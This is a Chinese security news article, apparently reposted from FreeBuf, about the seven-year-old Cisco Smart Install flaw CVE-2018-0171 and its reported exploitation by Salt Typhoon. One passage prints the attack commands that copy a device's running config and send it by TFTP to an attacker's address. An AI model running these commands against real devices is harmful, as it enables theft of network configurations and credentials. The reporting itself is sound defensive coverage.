![思科设备曝出七年旧漏洞 攻击者可远程执行代码]( "思科设备曝出七年旧漏洞 攻击者可远程执行代码")
思科网络设备中存在一个长达七年的安全漏洞,至今仍对未打补丁的系统构成重大风险,攻击者可利用该漏洞远程执行代码。
![思科设备曝出七年旧漏洞 攻击者可远程执行代码]( "思科设备曝出七年旧漏洞 攻击者可远程执行代码")
该漏洞编号为CVE-2018-0171,最初于2018年发现,针对思科的Smart Install(智能安装)功能。该功能是一种即插即用配置工具,旨在简化网络设备部署。
尽管漏洞年代久远,但最新证据表明其仍在被活跃利用,凸显了未修复历史漏洞的持续威胁。
该漏洞利用了思科Smart Install协议中的关键缺陷——该协议默认不要求身份验证,且在众多思科设备上默认启用。
这种设计缺陷与TCP 4786端口的常规开放形成叠加风险,为攻击者创造了绝佳条件。最新扫描显示,全球仍有超过1200台设备公开暴露Smart Install服务。
据ISC分析师确认,攻击者可通过构造特殊Smart Install数据包绕过验证检查,在受影响设备上执行未授权命令。
SANS互联网风暴中心研究人员在分析近期攻击活动时指出:"该漏洞特别危险,因为网络基础设施的更新周期通常比其他企业系统更长。"
该漏洞近期因与中国背景的APT(高级持续威胁)组织"盐台风"(Salt Typhoon)产生关联而再度引发关注。据报道,该组织在2024年末针对电信运营商的攻击活动中利用了CVE-2018-0171漏洞,有美国参议员称此次事件为"美国电信史上最严重的黑客攻击"。
尽管思科自2018年就提供了补丁,但仍有大量组织运行着存在漏洞的系统,为攻击者提供了唾手可得的目标。
攻击者首先连接Smart Install端口,然后发送特制命令。利用Smart Install Exploit Tool(SIET)等公开工具,攻击者无需认证即可提取设备配置。
典型攻击流程如下:首先建立TCP 4786端口连接,然后发送命令提取并传输配置文件:
copy system:running-config flash:/config.txt copy flash:/config.text tftp://192.168.10.2/192.168.10.1.conf
这些命令会强制设备将其运行配置复制到闪存目录,然后通过TFTP协议传输至攻击者机器。由于TFTP采用明文传输,包括加密密码在内的全部配置都会暴露。
采用Type 7加密的密码(基于公开的Vigenère密码)可被常见工具即时破解。获取配置后,攻击者能识别管理账户、网络拓扑和安全策略,从而在不触发警报的情况下实施进一步渗透。
这一长达七年的漏洞案例表明,历史安全问题仍对现代基础设施构成重大威胁。
![思科设备曝出七年旧漏洞 攻击者可远程执行代码]( "思科设备曝出七年旧漏洞 攻击者可远程执行代码")
![思科设备曝出七年旧漏洞 攻击者可远程执行代码]( "思科设备曝出七年旧漏洞 攻击者可远程执行代码")
原文始发于微信公众号(FreeBuf):思科设备曝出七年旧漏洞 攻击者可远程执行代码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
http://cn-sec.com/archives/3955929.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论